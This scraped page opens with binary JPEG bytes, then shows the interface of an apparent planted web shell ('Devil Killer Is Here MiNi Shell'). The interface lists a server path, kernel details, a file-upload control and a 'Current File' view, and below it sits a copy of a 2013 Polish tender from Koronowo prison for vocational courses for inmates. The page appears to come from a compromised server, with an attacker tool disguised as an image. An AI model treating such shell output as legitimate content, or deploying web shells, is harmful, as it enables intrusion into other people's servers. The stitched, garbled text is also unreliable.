JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130211/56196-N-2013.html

<p class="kh_header"><b>Koronowo: Usługa przeprowadzenia kursu malarz-szpachlarz, brukarz, glazurnik i zajęć aktywizacji zawodowej</b><br>
<b>Numer ogłoszenia: 56196 - 2013; data zamieszczenia: 11.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Koronowie , ul. Bydgoska 27, 86-010 Koronowo, woj. kujawsko-pomorskie, tel. 0 52 382 22 11, faks 0 52 382 09 00.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zp.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład Karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa przeprowadzenia kursu malarz-szpachlarz, brukarz, glazurnik i zajęć aktywizacji zawodowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie w roku 2013 trzech kursów: malarza-szpachlarza, glazurnika, brukarza oraz 3 cykli zajęć aktywizacji zawodowej w ramach realizacji projektu systemowego Cykl szkoleniowo - aktywizacyjny służący podniesieniu kwalifikacji zawodowych osób pozbawionych wolności oraz przygotowaniu ich do powrotu na rynek pracy po zakończeniu odbywania kary pozbawienia wolności w ramach Programu Operacyjnego Kapitał Ludzki. Ukończenie kursu zwiększy prawdopodobieństwo podjęcia aktywności zawodowej skazanych opuszczających Zakład Karny. Na zamówienie składa się przeprowadzenie:

Grupa 1 Kurs Malarz- szpachlarz

- Usługa przeprowadzenia kursu będzie realizowana w Zakładzie Karnym w Koronowie, jako kurs malarz-szpachlarz, zgodnie z wymaganiami określonymi w niniejszej siwz. CPV 80530000-8.
- W  kursie uczestniczyć będzie 12 skazanych.
- Termin realizacji kursu od dnia podpisania umowy do 31 maja 2013 r.
- Kurs realizowany będzie w dni powszednie w godz. 8.30 - 18.00 z przerwą na obiad w dni powszednie z wyłączeniem sobót i dni ustawowo wolnych od pracy.
-  Pomieszczenia do praktycznej nauki każdy z potencjalnych Wykonawców może obejrzeć po wcześniejszym uzgodnieniu terminu z Zamawiającym.  
- Zamawiający udostępni wykonawcy w ramach realizacji kursu sprzęt malarski: rusztowanie, drabiny, wiertarkę udarową.
- Zamówienie musi zostać zrealizowane zgodnie z programem nauczania zgodnym z obowiązującymi przepisami, kurs powinien zawierać 100 godzin dydaktycznych i powinien składać się z zajęć teoretycznych (20 godz.)  i zajęć praktycznych (80 godz.) przy założeniu, ze jedna godzina to 45 min.
- Zajęcia praktyczne muszą  odbyć się po zakończeniu zajęć teoretycznych.
-Wykonawca przeszkoli skazanych biorących udział w kursie w zakresie BHP, materiałoznawstwa, rysunku zawodowego, technologii z elementami maszynoznawstwa; zajęcia praktyczne (nabycie umiejętności malarsko - szpachlarskich) oraz przeprowadzi wymagane badania lekarskie  uprawniające kursantów także dwie osoby rezerwowe  do uczestnictwa  w kursie, spełniające wymagania badań zawodowych na malarza-szpachlarza. Badania odbędą się w siedzibie Zamawiającego.
Wykonawca odpowiada za przestrzeganie warunków BHP w trakcie całego kursu.
- Wykonawca ubezpieczy uczestników kursu od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem.
- Wykonawca zapewni uczestnikom kursu na czas trwania szkolenia konieczny sprzęt, narzędzia, materiały, odzież ochronną (kombinezon ochronny, rękawice, okulary) i obuwie ochronne  dostosowane do kursu i pory roku oraz warunków atmosferycznych, materiały dydaktyczne (skrypty, podręczniki itp.).
- Koszt materiałów przeznaczonych do praktycznej nauki zawodu nie może przekroczyć 40% całkowitej wartości kursu.
- Kurs zakończy się testem wiedzy z zagadnień przewidzianych w programie szkolenia. Czasu trwania testu nie wlicza się do czasu trwania szkolenia.
- Test sprawdzający wiedzę przeprowadzi przedstawiciel Instytucji realizującej zamówienie w uzgodnieniu z Zamawiającym. 
- Osoba, która uzyskała z testu końcowego ocenę wyższą od oceny niedostatecznej i uczestniczyła w co najmniej 80% zajęć lekcyjnych otrzyma zaświadczenie o ukończeniu szkolenia wydane na podstawie §3 pkt 5 Rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. 2012 poz. 186)  (wzór zaświadczenia określa załącznik nr 5 do w/w rozporządzenia) oraz dodatkowy certyfikat opatrzony właściwymi logotypami.
- Zamawiający zastrzega sobie prawo wprowadzenia nowego uczestnika w miejsce osoby,    która przerwała kurs w przypadku gdy nie zostało przekroczone 20% całości czasu trwania kursu.
- Wykonawca odpowiada za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia, jak również za należytą staranność przy realizacji zobowiązań umowy.
- Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania zamówienia.
- Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy.
- Płatność za usługę przeprowadzenia kursu  będzie dokonana przelewem, w terminie 30 dni, od daty otrzymania faktury  przez Zamawiającego.

- Wykonawca   przedstawi na trzy dni przed podpisaniem umowy:
1) dokumenty z których wynika, iż osoby, które będą realizować zamówienie posiadają odpowiedni poziom wiedzy i doświadczenie  w zakresie przedmiotu zamówienia,
2) program szkolenia  sporządzony zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. 2012 poz. 186) zawierający w szczególności: 

nazwę formy kształcenia;
czas trwania, liczbę godzin kształcenia i sposób jego organizacji;
wymagania wstępne dla uczestników szkolenia;
cele kształcenia i sposoby ich osiągania;
plan nauczania określający nazwę zajęć oraz ich wymiar (z uwzględnieniem części teoretycznej i części praktycznej);
treści nauczania w zakresie poszczególnych zajęć;
opis efektów kształcenia;
wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych;
sposób i formę zaliczenia;
3) szczegółowy harmonogram zajęć; 
4) dobranie poziomu wiedzy i doświadczenia wykładowców do tematyki szkolenia;

Ponadto:
1) przeprowadzenie kursu musi się odbyć zgodnie z ustaloną liczbą godzin, bez względu na ewentualne przerwy (choroby wykładowców, święta, dni wolne, awarie itp.)
2) wykonawca jest zobowiązany do prowadzenia dokumentacji przebiegu szkolenia tj. m.in.: 

- program nauczania,
- dziennika zajęć zawierającego listę obecności (podpisywaną niebieskim lub zielonym długopisem przez beneficjentów ostatecznych), wymiar godzin, tematy zajęć edukacyjnych;
- listy obecności na których beneficjenci składają podpis długopisem koloru niebieskiego, a które po zakończeniu zajęć zostaną przekazane Zamawiającemu,
- protokół z testu wiedzy,
- ewidencję wydanych zaświadczeń,
- kserokopie wydanych zaświadczeń (Wykonawca przekazuje Zamawiającemu dwa egzemplarze kserokopii wydanych zaświadczeń),
- wykaz wydanych zaświadczeń i certyfikatów wraz z potwierdzonym przez uczestników kursu ich odbiorem,
- wykaz przekazanych materiałów oraz środków ochrony indywidualnej wraz z potwierdzonym przez uczestników kursu ich odbiorem,
- Jeden egzemplarz materiałów szkoleniowych przekazanych beneficjentom, który po zakończeniu szkolenia zostanie dołączony do dokumentacji Zamawiającego,
- Przeprowadzone ankiety na temat kursu,
- Dokumenty potwierdzające ubezpieczenie uczestników,
- Faktury VAT lub rachunki potwierdzające dostarczenie materiałów w wymaganej ilości (kserokopie dokumentów wraz ze sporządzoną kalkulacją wykonanej usługi należy dołączyć do dokumentacji kursowej przekazywanej Zamawiającemu po zakończeniu szkolenia),
3) wykonawca jest zobowiązany do przeprowadzenia ankiet umożliwiających ocenę szkolenia absolwentom;

Wykonawca zobowiązuje się do oznaczania dokumentacji i materiałów kursów znakami zgodnymi z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.

Grupa 2  Kurs Glazurnik

- Usługa przeprowadzenia kursu będzie realizowana w Zakładzie Karnym w Koronowie, jako kurs glazurnika, zgodnie z wymaganiami określonymi w niniejszej siwz. CPV 80530000-8.
- W  kursie uczestniczyć będzie 12 skazanych.
- Termin realizacji kursu od dnia podpisania umowy do 31 maja 2013 r.
- Kurs realizowany będzie w dni powszednie w godz. 8.30 - 18.00 z przerwą na obiad w dni powszednie z wyłączeniem sobót i dni ustawowo wolnych od pracy.
-  Pomieszczenia do praktycznej nauki każdy z potencjalnych Wykonawców może obejrzeć po wcześniejszym uzgodnieniu terminu z Zamawiającym.  
- Zamawiający udostępni wykonawcy w ramach realizacji kursu sprzęt glazurski: przecinarkę do glazury, szlifierkę kątową,
- Zamówienie musi zostać zrealizowane zgodnie z programem nauczania zgodnym z obowiązującymi przepisami, kurs powinien zawierać 100 godzin dydaktycznych i powinien składać się z zajęć teoretycznych (20 godz.)  i zajęć praktycznych (80 godz.) przy założeniu, ze jedna godzina to 45 min.
- Zajęcia praktyczne muszą  odbyć się po zakończeniu zajęć teoretycznych.
-Wykonawca przeszkoli skazanych biorących udział w kursie w zakresie BHP oraz przeprowadzi wymagane badania lekarskie  uprawniające kursantów także dwie osoby rezerwowe  do uczestnictwa  w kursie, spełniające wymagania badań zawodowych na glazurnika. Badania odbędą się w siedzibie Zamawiającego.
-Wykonawca przygotuje uczestników kursu do wykonywania pracy w zawodzie glazurnik         w tym min: poznanie narzędzi, materiałów, obsługa używanych sprzętów, przygotowanie podłoża, techniki prac, itp. Wykonawca odpowiada za przestrzeganie warunków BHP w trakcie całego kursu.
- Wykonawca ubezpieczy uczestników kursu od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem.
- Wykonawca zapewni uczestnikom kursu na czas trwania szkolenia konieczny sprzęt, narzędzia, materiały, odzież ochronną (kombinezon ochronny, rękawice, okulary) i obuwie ochronne  dostosowane do kursu i pory roku oraz warunków atmosferycznych, materiały dydaktyczne (skrypty, podręczniki itp.).
- Koszt materiałów przeznaczonych do praktycznej nauki zawodu nie może przekroczyć 40% całkowitej wartości kursu.
- Kurs zakończy się testem wiedzy z zagadnień przewidzianych w programie szkolenia. Czasu trwania testu nie wlicza się do czasu trwania szkolenia.
- Test sprawdzający wiedzę przeprowadzi przedstawiciel Instytucji realizującej zamówienie w uzgodnieniu z Zamawiającym. 
- Osoba, która uzyskała z testu końcowego ocenę wyższą od oceny niedostatecznej i uczestniczyła w co najmniej 80% zajęć lekcyjnych otrzyma zaświadczenie o ukończeniu szkolenia wydane na podstawie §3 pkt. 5 Rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. 2012 poz. 186)  (wzór zaświadczenia określa załącznik nr 5 do w/w rozporządzenia) oraz dodatkowy certyfikat opatrzony właściwymi logotypami.
- Zamawiający zastrzega sobie prawo wprowadzenia nowego uczestnika w miejsce osoby,    która przerwała kurs w przypadku gdy nie zostało przekroczone 20% całości czasu trwania kursu.
- Wykonawca odpowiada za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia, jak również za należytą staranność przy realizacji zobowiązań umowy.
- Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania zamówienia.
- Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy.
- Płatność za usługę przeprowadzenia kursu  będzie dokonana przelewem, w terminie 30 dni, od daty otrzymania faktury  przez Zamawiającego.
- Wykonawca   przedstawi na trzy dni przed podpisaniem umowy:
1) dokumenty z których wynika, iż osoby, które będą realizować zamówienie posiadają odpowiedni poziom wiedzy i doświadczenie  w zakresie przedmiotu zamówienia,
2) program szkolenia  sporządzony zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. 2012 poz. 186) zawierający w szczególności: 

- nazwę formy kształcenia;
- czas trwania, liczbę godzin kształcenia i sposób jego organizacji;
- wymagania wstępne dla uczestników szkolenia;
- cele kształcenia i sposoby ich osiągania;
- plan nauczania określający nazwę zajęć oraz ich wymiar (z uwzględnieniem części  
- teoretycznej i części praktycznej);
- treści nauczania w zakresie poszczególnych zajęć;
- opis efektów kształcenia;
- wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych;
- sposób i formę zaliczenia;
3) szczegółowy harmonogram zajęć; 
4) dobranie poziomu wiedzy i doświadczenia wykładowców do tematyki szkolenia;

Ponadto:
1) przeprowadzenie kursu musi się odbyć zgodnie z ustaloną liczbą godzin, bez względu na ewentualne przerwy (choroby wykładowców, święta, dni wolne, awarie itp.)
2) wykonawca jest zobowiązany do prowadzenia dokumentacji przebiegu szkolenia tj. m.in.: 

program nauczania,
dziennika zajęć zawierającego listę obecności (podpisywaną niebieskim lub zielonym
długopisem przez beneficjentów ostatecznych), wymiar godzin, tematy zajęć
edukacyjnych;
listy obecności na których beneficjenci składają podpis długopisem koloru
niebieskiego, a które po zakończeniu zajęć zostaną przekazane Zamawiającemu,
protokół z testu wiedzy,
ewidencję wydanych zaświadczeń,
kserokopie wydanych zaświadczeń (Wykonawca przekazuje Zamawiającemu dwa
egzemplarze kserokopii wydanych zaświadczeń),
wykaz wydanych zaświadczeń i certyfikatów wraz z potwierdzonym przez uczestników
    kursu ich odbiorem,
wykaz przekazanych materiałów oraz środków ochrony indywidualnej wraz z
potwierdzonym przez uczestników kursu ich odbiorem,
Jeden egzemplarz materiałów szkoleniowych przekazanych beneficjentom, który po
zakończeniu szkolenia zostanie dołączony do dokumentacji Zamawiającego,
Przeprowadzone ankiety na temat kursu,
Dokumenty potwierdzające ubezpieczenie uczestników,
Faktury VAT lub rachunki potwierdzające dostarczenie materiałów w wymaganej ilości
(kserokopie dokumentów wraz ze sporządzoną kalkulacją wykonanej usługi należy
dołączyć do dokumentacji kursowej przekazywanej Zamawiającemu po zakończeniu
szkolenia),
3) wykonawca jest zobowiązany do przeprowadzenia ankiet umożliwiających ocenę szkolenia absolwentom;

Wykonawca zobowiązuje się do oznaczania dokumentacji i materiałów kursów znakami zgodnymi z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.

  Grupa 3 Kurs Brukarza

- Usługa przeprowadzenia kursu będzie realizowana w Zakładzie Karnym w Koronowie, jako kurs brukarza, zgodnie z wymaganiami określonymi w niniejszej siwz. CPV 80530000-8.
- W  kursie uczestniczyć będzie 12 skazanych.
- Termin realizacji kursu od dnia podpisania umowy do 31 maja 2013 r.
- Kurs realizowany będzie w dni powszednie w godz. 8.30 - 18.00 z przerwą na obiad w dni powszednie z wyłączeniem sobót i dni ustawowo wolnych od pracy. 
- Wykonawca przygotuje uczestników  kursu do wykonywania pracy brukarza w tym min: poznanie narzędzi, materiałów, sprzętu używanego, przygotowaniu podłoża, poznanie sposobów układania kostki brukowej itp. 
- Plac przeznaczony do praktycznej nauki znajduje się na terenie Zakładu Karnego w Koronowie. Miejsce realizacji kursu każdy z potencjalnych Wykonawców może obejrzeć po wcześniejszym uzgodnieniu terminu z Zamawiającym.
- Zamawiający udostępni Wykonawcy w ramach realizacji kursu następujący sprzęt: zagęszczarkę, przecinarkę do kostki, betoniarkę, młot udarowo obrotowy, niwelator laserowy, taczki.
- Zamówienie musi zostać zrealizowane zgodnie z programem nauczania zgodnym z obowiązującymi przepisami, kurs powinien zawierać 100 godzin dydaktycznych i powinien składać się z zajęć teoretycznych (20 godz.) i praktycznych (80 godz.) przy założeniu, ze jedna godzina to 45 min. 
- Zajęcia praktyczne muszą  odbyć się po zakończeniu zajęć teoretycznych.
- Wykonawca przeszkoli skazanych biorących udział w kursie w zakresie BHP, oraz przeprowadzi wymagane badania lekarskie (także 2 osób rezerwowych) stwierdzające możliwość uczestniczenia skazanych w kursie brukarza.
Badania odbędą się w siedzibie Zamawiającego.
- Wykonawca ubezpieczy uczestników kursu od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem.
- Wykonawca zapewni uczestnikom kursu na czas trwania szkolenia konieczny sprzęt, narzędzia, materiały oraz odzież ochronną, materiały dydaktyczne (skrypty, podręczniki itp.) 
- Koszt materiałów przeznaczonych do praktycznej nauki zawodu nie może przekroczyć 40% całkowitej wartości kursu.
- Kurs zakończy się testem wiedzy z zagadnień przewidzianych w programie szkolenia. Czasu trwania testu nie wlicza się do czasu trwania szkolenia.
- Test sprawdzający wiedzę   przeprowadzi przedstawiciel Instytucji realizującej zamówienie w uzgodnieniu z Zamawiającym. 
- Osoba, która uzyskała z testu końcowego ocenę wyższą od oceny niedostatecznej i uczestniczyła w co najmniej 80% zajęć lekcyjnych otrzyma zaświadczenie o ukończeniu szkolenia wydane na podstawie §3 pkt. 5 Rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. 2012 poz. 186)  (wzór zaświadczenia określa załącznik nr 5 do w/w rozporządzenia) oraz dodatkowy certyfikat opatrzony właściwymi logotypami.
- Zamawiający zastrzega sobie prawo wprowadzenie nowego uczestnika w miejsce osoby,    która przerwała kurs w przypadku gdy nie zostało przekroczone 20% całości czasu trwania kursu.
- Wykonawca odpowiada za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia, jak również za należytą staranność przy realizacji zobowiązań umowy.
- Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania zamówienia.
- Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy.
- Płatność za usługę przeprowadzenia kursu  będzie dokonana przelewem , w terminie 30 dni, od daty otrzymania faktury  przez Zamawiającego.
- Wykonawca   przedstawi na trzy dni przed podpisaniem umowy:
1) dokumenty z których wynika, iż osoby, które będą realizować zamówienie posiadają odpowiedni poziom wiedzy i doświadczenie  w zakresie przedmiotu zamówienia,
2) program szkolenia  sporządzony zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. 2012 poz. 186) zawierający w szczególności: 

nazwę formy kształcenia;
czas trwania, liczbę godzin kształcenia i sposób jego organizacji;
wymagania wstępne dla uczestników szkolenia;
cele kształcenia i sposoby ich osiągania;
plan nauczania określający nazwę zajęć oraz ich wymiar (z uwzględnieniem części teoretycznej i części praktycznej);
treści nauczania w zakresie poszczególnych zajęć;
opis efektów kształcenia;
wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych;
sposób i formę zaliczenia;

3) szczegółowy harmonogram zajęć; 
4) dobranie poziomu wiedzy i doświadczenia wykładowców do tematyki szkolenia;
Ponadto:
1) przeprowadzenie kursu musi się odbyć zgodnie z ustaloną liczbą godzin, bez względu na ewentualne przerwy (choroby wykładowców, święta, dni wolne, awarie itp.)
2) wykonawca jest zobowiązany do prowadzenia dokumentacji przebiegu szkolenia tj. m.in.: 
program nauczania,
dziennika zajęć zawierającego listę obecności (podpisywaną niebieskim lub zielonym długopisem przez beneficjentów ostatecznych), wymiar godzin, tematy zajęć edukacyjnych;
listy obecności na których beneficjenci składają podpis długopisem koloru niebieskiego, a które po zakończeniu zajęć zostaną przekazane Zamawiającemu,
protokół z testu wiedzy,
ewidencję wydanych zaświadczeń,
kserokopie wydanych zaświadczeń (Wykonawca przekazuje Zamawiającemu dwa
egzemplarze kserokopii wydanych zaświadczeń),
wykaz wydanych zaświadczeń i certyfikatów wraz z potwierdzonym przez uczestników
kursu ich odbiorem,
wykaz przekazanych materiałów oraz środków ochrony indywidualnej wraz z
potwierdzonym przez uczestników kursu ich odbiorem,
Jeden egzemplarz materiałów szkoleniowych przekazanych beneficjentom, który po
zakończeniu szkolenia zostanie dołączony do dokumentacji Zamawiającego,
Przeprowadzone ankiety na temat kursu,
Dokumenty potwierdzające ubezpieczenie uczestników,
Faktury VAT lub rachunki potwierdzające dostarczenie materiałów w wymaganej ilości
(kserokopie dokumentów wraz ze sporządzoną kalkulacją wykonanej usługi należy
dołączyć do dokumentacji kursowej przekazywanej Zamawiającemu po
    zakończeniu szkolenia),

3) wykonawca jest zobowiązany do przeprowadzenia ankiet umożliwiających ocenę szkolenia absolwentom;

Wykonawca zobowiązuje się do oznaczania dokumentacji i materiałów kursu znakami zgodnymi z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.

Grupa 4  Zajęcia aktywizacji zawodowej

- Przeprowadzenie 3 cykli zajęć aktywizacji zawodowej dla 36 skazanych (3 grupy po 12 skazanych). 
- Każdy cykl aktywizacji obejmuje 20 godz. ( przy założeniu, że jedna godzina dydaktyczna to 45 min) w tym zajęcia grupowe i konsultacje indywidualne.
- Zajęcia odbywać się będą  na terenie Zakładu Karnego w Koronowie.
- Zajęcia odbywać się będą w dni powszednie w godz. 8.30 - 18.00 z przerwą na obiad w dni powszednie z wyłączeniem sobót i dni ustawowo wolnych od pracy. 
 - Aktywizacją zawodową zostaną objęci skazani uczestniczący w kursie zawodowym
- Termin realizacji od dnia podpisania umowy do 31 maja 2013r.
- Wykonawca przygotuje uczestników do prawidłowego i sprawnego poruszania się na rynku pracy w tym min. autoprezentacja,  umiejętność prowadzenia rozmów z pracodawcami, rozmowa kwalifikacyjna, dokumenty aplikacyjne, sposoby poszukiwania pracy, poznawanie i odkrywanie swoich umiejętności i predyspozycji zawodowych, przygotowywanie CV i listów motywacyjnych przy użyciu komputera. 
- Zamawiający udostępni Wykonawcy w ramach realizacji zajęć salę komputerową z 11 stanowiskami.
- Wykonawca zapewni uczestnikom zajęć materiały dydaktyczne (skrypty, podręczniki itp.)
- Wykonawca zapewnia kadrę dydaktyczną o kwalifikacjach odpowiednich do prowadzenia zajęć psychokorekcyjnych oraz doradztwa zawodowego.
-  Zamówienie musi zostać zrealizowane zgodnie z programem nauczania. 
- Osoby uczestniczące w aktywizacji zawodowej, które uczestniczyły w co najmniej 80% zajęć uzyskają odpowiednie zaświadczenie.
- Wykonawca ubezpieczy uczestników zajęć aktywizacji zawodowej od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem.
- Wykonawca odpowiada za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia, jak również za należytą staranność przy realizacji zobowiązań umowy.
- Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania zamówienia.
- Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem Wykonawcy.
- Płatność za usługę przeprowadzenia zajęć aktywizacji zawodowej będzie dokonana przelewem , w terminie 30 dni, od daty otrzymania faktury przez Zamawiającego.

- Wykonawca   przedstawi na trzy dni przed podpisaniem umowy:
1) dokumenty z których wynika, iż osoby, które będą realizować zamówienie posiadają odpowiedni poziom wiedzy i doświadczenie  w zakresie przedmiotu zamówienia,
2) program szkolenia  sporządzony zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. 2012 poz. 186)  zawierający w szczególności: 

nazwę formy kształcenia;
czas trwania, liczbę godzin kształcenia i sposób jego organizacji;
wymagania wstępne dla uczestników szkolenia;
cele kształcenia i sposoby ich osiągania;
plan nauczania określający nazwę zajęć oraz ich wymiar;
